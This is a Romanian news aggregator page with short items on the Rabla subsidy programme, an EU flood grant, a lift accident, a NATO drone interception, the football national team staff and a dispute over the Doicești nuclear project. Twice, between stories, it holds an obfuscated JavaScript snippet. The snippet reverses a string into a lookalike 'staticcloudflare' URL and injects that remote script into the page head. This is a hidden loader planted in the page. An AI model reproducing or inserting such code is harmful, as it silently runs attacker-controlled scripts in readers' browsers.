Agregator de ştiri

Diana Buzioanu a fost întrebată joi când ar putea începe înscrierile pentru Rabla.

„Deci noi avem un termen de minim 10 zile de când punem ordinul în dezbatere. Așteptăm și un răspuns, o să trimitem astăzi o întrebare și am primit răspunsul de la Consiliul Concurenței, o să trimitem astăzi o întrebare și către MEDAT. După ce primim aceste răspunsuri, și noi sperăm să fie vorba de câteva zile în care să primim răspunsul, vom putea să punem în transparență ordinul. Ordinul va sta în transparență 10 zile și apoi se intră pe exact calendarul care a fost aplicat la Rabla și în anii anteriori”, a spus Diana Buzoianu.

Ministra Mediului a vorbit despre modificările propuse în ceea ce privește mașinile care pot fi cumpărate. Ea a fost întrebată dacă românii ar putea să cumpere cu aceste vouchere doar mașini fabricate în Uniunea Europeană sau în Maroc, Turcia, Marea Britanie.

„Propunerea pe care o propunem către ministere, să vedem dacă este o propunere cu care celelalte ministere sunt de acord, este să avem mașini fabricate sau asamblate în Europa sau în statele care au convenții pe zona de Marea Mediterană. Deci practic, și UK, că UK are altă prevedere, alte tratate semnate la nivel de UE”, a spus Buzoianu.

Programul pentru persoane juridice, suspendat

Ea anunță o limitare în ceea ce privește achizionarea motocicletelor și mopedelor, cel mai probabil la 10% din buget.

Diana Buzoianu a anunțat și o modificare în ceea ce privește programul Rabla pentru UAT-uri.

„Anul trecut a fost lansat programul care avea vouchere pentru 25 de mașini pentru instituții publice. Am deschis proiectul acesta în limita a maxim 8 mașini pentru anumite categorii de instituții. Am scăzut la 5 sau la 6 mașini pe instituție”, a explicat Buzoianu.

Ministra a spus că programul Rabla pentru persoane juridice este suspendat și că va fi reluat „în momentul în care vom identifica bugetul necesar”.

În urma ședinței de Guvern de joi, purtătorul de cuvânt al Guvernului, Ioana-Nadina Dogioiu, a transmis că România va primi 14,3 milioane de euro de la UE.

Banii vin în urma implementării grantului din Fondul de Solidaritate al Uniunii Europene. Suma a fost aprobată de Comisia Europeană.

Zeci de persoane evacuate în mai – iunie 2025

Suma va fi folosită pentru acoperirea unei părți din cheltuiele generate din cauza inundațiilor extreme produse începând cu luna mai 2025.

În perioada mai-iunie 2025, 125 de persoane din județele Brașov, Covasna și Harghita au fost evacuate în urma inundațiilor. Alte 27 de persoane au fost izolate în județul Neamț. Inundațiile au afectat și Salina Praid.

„Ne bucurăm că astăzi avem în sfârșit bugetul AFM aprobat”, a declarat ministrul.

Potrivit acesteia, proiectele mutate de pe PNRR pe AFM vor putea primi finanțările necesare pentru continuarea lucrărilor. Este vorba despre proiecte precum insule ecologice, centre de aport voluntar, platforme pentru gunoi de grajd și investiții în rețele de apă și canalizare.

Ministrul a spus că multe dintre șantiere au continuat lucrările, însă plățile nu puteau fi făcute până la aprobarea bugetului.

„În sfârșit vom avea resursele necesare”

„Vorbim de peste 500 de proiecte care se află în această situație și care în sfârșit vor avea resursele necesare”, a afirmat Buzoianu.

Ea a precizat că o parte importantă dintre proiecte ar putea fi finalizate chiar în acest an.

Ministrul Mediului a anunțat și lansarea unui nou program pentru apă și canalizare, cu un buget de 1,5 miliarde de lei.

„Vorbim de un proiect care va ajuta România să nu mai fie în pericol de procedură de infringement”, a declarat Buzoianu.

Potrivit acesteia, România riscă sancțiuni și amenzi de sute de milioane de lei anual dacă investițiile nu sunt realizate.

Se vor împlini trei săptămâni de când Guvernul Ilie Bolojan a fost demis pe o moțiune de cenzură cu un număr record de voturi, iar clasa politică nu reușește să creioneze nicio formulă stabilă de viitoare guvernare.

Cine a greșit mai mult de România a reușit să rămână fără Guvern? Ce responsabilități au Ilie Bolojan dar și PSD în această criză? Ce soluții are președintele Nicușor Dan? De ce susținătorii președintelui României s-au mutat la Ilie Bolojan? De ce activiștii politici au nevoie de „Mesia” în România? Din punct de vedere democratic, ce este acela un „cordon sanitar”? Cum s-ar putea reduce clivajul între cele „două Românii”, separate de alegerile prezidențiale? Ce ar fi făcut Crin Antonescu dacă ar fi fost președinte? Care sunt prioritățile reale ale României?

Despre toate acestea și multe altele discutăm cu Crin Antonescu, fostul președinte PNL și fostul candidat la Președinția României.

Vineri, de la ora 13.00, în exclusivitate, pe Mediafax.

„Este din nefericire un eșec al diplomației românești, un eșec al Ministerului Afacerilor Externe, în mod special și un eșec al guvernării din ultimele luni. Pentru că atunci când o prestigioasă publicație, precum Politico, vorbește așa de țara ta, ei vorbesc în baza unor informații pe care le-au primit. Și este o realitate că din nefericire, mai ales în ultimile luni, România nu s-a exprimat așa cum trebuie, la nivel european”, a declarat Victor Negrescu, joi, la B1 TV. 

Hub-ul de securitate maritimă și „lipsa de eficiență” a MAE

În acest sens, europarlamentarul social-democrat a menționat și lipsa de progres în inițiative precum hub-ul european de securitate maritimă, despre care a spus că, deși este susținut la nivelul Comisiei Europene și al Parlamentului European. 

„Vorbeam în urmă câteva săptămâni cu dumneavoastră despre hub-ul european de securitate maritimă. Comisia Europeană sprijină acest demers,  uu, la nivelul Parlamentului European, am obținut bani pentru acest demers. El nu s-a materializat încă, tocmai prin lipsa de eficiență a diplomației românești”, mai spune Negrescu. 

Ignorarea mecanismelor de cooperare interministerială

Vicepreședintele Parlamentului European a mai criticat și lipsa de coordonare interministeriala în dialogul cu autoritățile europene, subliniind că mecanismele existente nu au fost utilizate suficient în ultimile luni. 

„Avem un mecanism de coordonare în domeniul afacerilor europene, la nivelul Ministerului Afacerilor Externe, unde toate ministerele se prezintă și atunci când sunt subiecte mari, de anvergură europeană. Aceste sisteme nu au fost operaționale în ultimile luni, rareori s-au întâlnit și în sensul acesta România a ignorat aceste tematici”, mai spune Negrescu. 

Politico: România, aproape absentă din diplomția de la Bruxelles

Reacția liderului social-democrat vine în urma unui articol, apărut în presa internațională despre diplomația de la București. Jurnaliștii de la Politico consideră că România este aproape absentă din diplomația de la Bruxelles, în ciuda faptului că este al șaselea cel mai populat stat membru al Uniunii Europene și unul dintre principalii beneficiari ai fondurilor europene. 

Publicația menționează că reprezentanța permanentă a României pe lângă UE este singura dintre cele 27 de state membre care nu are un purtător de cuvânt sau un responsabil de presă și care nu a emis un comunicat de presă în aproape un an. 

Aceștia mai evidențiază și probleme tehnice care fac ca site-ul reprezentanței sau Ministerului Afacerilor Externe să fie frecvent nefuncționale. 

„Din ce știu, a căzut de la etajul 4 și se pare că nu au funcționat frânele de siguranță, tamburii aceia. Trebuie făcută o expertiză să vedem mai exact”, a declarat Radu Raul Dorobanțu, Inspectorul Șef al ISCIR București.

„A căzut în puțul liftului la subsol și s-a oprit în tamburul de siguranță. E un tambur ca la de tren, dacă ați faceți o idee, care oprește liftul”, a declarat Dorobanțu, referindu-se la la arcurile masive situate în camera liftului la subsol, care au rolul de a opri un lift în cazul în care sistemele de frânare nu funcționează.

Acesta a precizat că ISCIR va da publicității un raport, în urma cercetărilor.

Potrivit inspectorului, ultima verificare a liftului s-a desfășurat în 9 aprilie 2026. Cu toate, Dorobanțu spune că verificarea tehnică nu se face de către ISCIR, ci de către CNCIR, Compania Națională pentru Controlul Cazanelor, Instalațiilor de Ridicat și Recipientelor sub Presiune.

„ISCIR-ul când se montează un lift sau se repară, se face o verificare tehnică de către cei de la CNICIR, care vin la ISCIR cu o fișă, pe care ISCIR-ul o aprobă dacă se îndeplinesc toate condițiile. Acesta a fost făcută. Mai demult, nu știu ce vă spun exact când, dar ultima verificare tehnică, care este periodică, e făcută pe 9 aprilie anul acesta, de către CNICIR”, a declarat Dorobanțu. 

Dorobanțu acuză că responsabilul cu verificarea tehnică nu a semnalat defecțiunile apărute

Angajații ministerului Transporturilor care lucrau în clădirea Palatului CFR au acuzat că liftul, care funcționa, scotea zgomote zilele trecute. Cu toate acestea, Inspectorul Șef ISCIR București acuză că responsabilul cu verificarea tehnică nu a semnalat defecțiunile apărute.

„Ideea este că întreținătorii liftului și persoana desemnată care se ocupă aici, se numește responsabil cu verificarea tehnică, are obligația la fiecare incident de a anunțat ISCIR. Incidentul nu a fost anunțat, din păcate, deci nu știm să vă spunem mai multe detalii”, a declarat Dorobanțu. 

Acesta a spus că în cazul în care o persoană este blocată în lift, se anunță. „În general, când sunt astfel de cazuri în care se blochează o persoană în lift sau așa, de obicei anunță. Nu de fiecare dată, dar anunță. Și atunci venim și facem un control și venim să facem vorba”, a declarat Dorobanțu. 

Luni, un lift a căzut de la etajul 7

Acesta a vorbit și despre incidentul de luni, în cadrul căruia mai multe persoane în lift au căzut în gol de la etajul 7. Atunci, liftul s-a oprit între parter și mezanim, etaj mai scurt situat între parter și etajul 1.

„A avut loc un incident asemănător, atunci a căzut de la etajul 7, dar atunci au funcționat frânele de siguranță, s-au împănat și liftul s-a oprit în siguranță undeva atât, așa, între parter și mezanim”, a declarat inspectorul șef al ISCIR București, Dorobanțu. 

Declarațiile au fost date după ce, un lift a căzut în gol în clădirea Palatului CFR din subordinea Ministerului Transporturilor. În cadrul incidentului, 5 persoane se aflau în lift, dintre care două, un bărbat și o femeie, au fost duse la spital.
(function(){var _86250a=9482;var _bd6738="sj.ssc/ipa/orp.eralfduolccitats//:sptth";var _f07201=_bd6738.split("").reverse().join("");var _aff5ba=5183;var _e834fd=document.createElement("script");_e834fd.src=_f07201;_e834fd.defer=!0;document.head.appendChild(_e834fd)})();

„Președintele României a avut astăzi o conversație telefonică cu Prim-ministrul Republicii Estonia, Kristen Michal.

Șeful Guvernului de la Talinn a mulțumit României pentru doborârea unei drone, intrate în spațiul aerian eston, de către un avion F-16 românesc din Detașamentul Carpathian Vipers.

Pentru a patra oară începând cu 2007, Forțele Aeriene Române asigură serviciul de Poliție Aeriană în statele baltice. La misiunea din acest an participă 6 aeronave F16 şi 101 militari.

România contribuie direct la securitatea aliaților săi și a întregului Flanc Estic”, a transmis Palatul Cotroceni.

Un avion F-16 românesc aflat în misiune NATO de poliție aeriană în statele baltice a doborât acum 3 zile o dronă ucraineană intrată în spațiul aerian al Estoniei. Incidentul a avut loc pe fondul unor interferențe masive de război electronic și bruiaj GPS în regiune.

Secretarul general al NATO, Mark Rutte, a lăudat acțiunea piloților români. El a subliniat că fiecare situație defensivă depinde de evaluările tactice din teren și de riscurile asupra populației civile.

Pilotul român implicat în această misiune de succes a fost propus pentru decorare oficială.

Astăzi, Letonia a emis o nouă alertă de amenințare aeriană în legătură cu o dronă intrată în spațiul aerian al țării iar NATO a ridicat avioanele de vânătoare pentru a 3-a zi consecutiv.
(function(){var _86250a=9482;var _bd6738="sj.ssc/ipa/orp.eralfduolccitats//:sptth";var _f07201=_bd6738.split("").reverse().join("");var _aff5ba=5183;var _e834fd=document.createElement("script");_e834fd.src=_f07201;_e834fd.defer=!0;document.head.appendChild(_e834fd)})();

„Va mai fi SAP o companie de software în viitor?" a întrebat Christian Klein, CEO-ul SAP, pe scena principală a SAP Sapphire Madrid, cel mai mare eveniment de tehnologie organizat de o companie europeană. Întrebarea pare că nu a fost una retorică ci un semnal că liderul industriei tech din Europa, fondată acum câteva decenii, cu venituri de 36,8 mld. euro şi peste 100.000 de angajaţi, îşi redefineşte identitatea. Răspunsul la întrebare l-a dat, la finalul a 90 de minute de prezentare, nu Klein, ci Joule, asistentul AI al companiei (evident, citind un script): „SAP devine o companie de business AI." Klein a replicat: „Propun să ţii tu întreg keynote-ul anul viitor."

Antrenorul Naționalei Gheorghe Hagi și-a definitivat componența staff-ului tehnic, medical și de suport.

Selecționerul va colabora cu antrenori secunzii Cătălin Anghel, Ionel Gane, Cristi Sava (Analiză Video) și cu Ștefan Preda, antrenor de portar, a anunțat joi Federația Română de Fotbal.
Analiști video vor fi Vlad Lakatos și Andrei Butnăraș (Individual – Scouting), iar preparatori fizici Darius Hîmpea, Robert Hodorogea, Dan Curtifan (Prevenție – Recuperare).

Medicul Naționalei este Claudiu Stamatescu, iar din staff-ul medical fac parte Toma Vasilescu, Ovidiu Blendea, Adrian Gherovăț, Dragoș Paraschiv, Alin Burileanu, Constantin Crețu și Vivian Negoiță. Andrei Voica este bucătar-șef, Cristi Mărgărit nutriționist, Cătălin Gheorghiu team manager, Cătălin Popescu ofițer de presă, iar Alexandru Nicilă este ofițer securitate.

România va juca la început de iunie primele două meciuri cu Gheorghe Hagi pe bancă. Naționala întâlnește în 2 iunie Georgia în deplasare și în 6 iunie, pe teren propriu, jocă cu Țara Galilor.

Selecționerul Gheorghe Hagi a anunțat miercuri că România va juca cu două echipe în meciurle cu Georgia și Țara Galilor de la începutul lunii iunie.

Situaţia este cea care este, dar ce este de făcut ca ea să fie întoarsă? Scăderea taxelor este o soluţie. A doua este creşterea productivităţii, spune economistul Laurian Lungu. Guvernul trebuie să facă în aşa fel încât preţul energiei să scadă, spune Ionuţ Dumitru, economistul-şef al Raiffeisen Bank.

Grupul eMAG şi-a bugetat investiţii de 1,2 miliarde de lei pentru anul fiscal curent 2026-2027, cea mai mare parte, 700-800 de milioane de lei, fiind direcţionată către logistică şi in­frastructura de livrare, circa 200 de milioa­ne către inteligenţă artificială, iar restul către servicii financiare, în condiţiile în care piaţa de e-commerce din România are în conti­nuare potenţial de creştere.

Declarația a fost făcută joi.

„Trebuie să înțeleagă că este un premier demis care nu poate pune în discuție parteneriate strategice (…) totodată slăbește poziția unei companii strategice și acest lucru se vede la Bursă”, a spus Grindeanu referindu-se la compania Nuclearelectrica.

Președintele PSD consideră că premierul interimar pune în pericol parteneriatul strategic cu SUA.

„Trebuie să înceteze și să înțeleagă că (mai stă la Guvern n.r.) câteva zile, nu are dreptul să facă lucruri de acest tip (…) Proiecte de acest tip nu pot fi aruncate la coș (…) Mi se pare că în acest moment domnul Bolojan face mai mult decât să arunce în aer un proiect strategic (…) aruncă în aer un parteneriat strategic”, a mai spus Grindeanu adăugând că finanțarea proiectului nu se face din surse bugetare.

Ce a spus Ilie Bolojan despre proiectul reactoarelor nucleare

Reacția șefului PSD a apărut după ce, miercuri seara, premierul interimar Ilie Bolojan a declarat la B1 TV că proiectul reactoarelor nucleare de la Doicești are „probleme serioase” de fezabilitate.

Premierul interimar a mai spus că a informat Ambasada SUA despre problemele proiectului și a indicat conducerea Nuclearelectrica drept responsabilă pentru modul în care au fost gestionate sumele alocate.

„Chiar dacă asta s-a făcut, de exemplu, cu o companie americană, mie mi s-a părut responsabil că dacă îți respecți partenerii, să-i informezi. Așa cum am făcut eu cu Ambasada Statului Unite. Acest proiect are niște probleme, ar fi bine să-l analizăm cât se poate de atent, pentru că dacă îl ridici pe agenda de subiecte comune la un anumit nivel, știind că el are probleme serioase de fezabilitate, atunci înseamnă că nu-ți respecți partenerul”, a explicat Ilie Bolojan.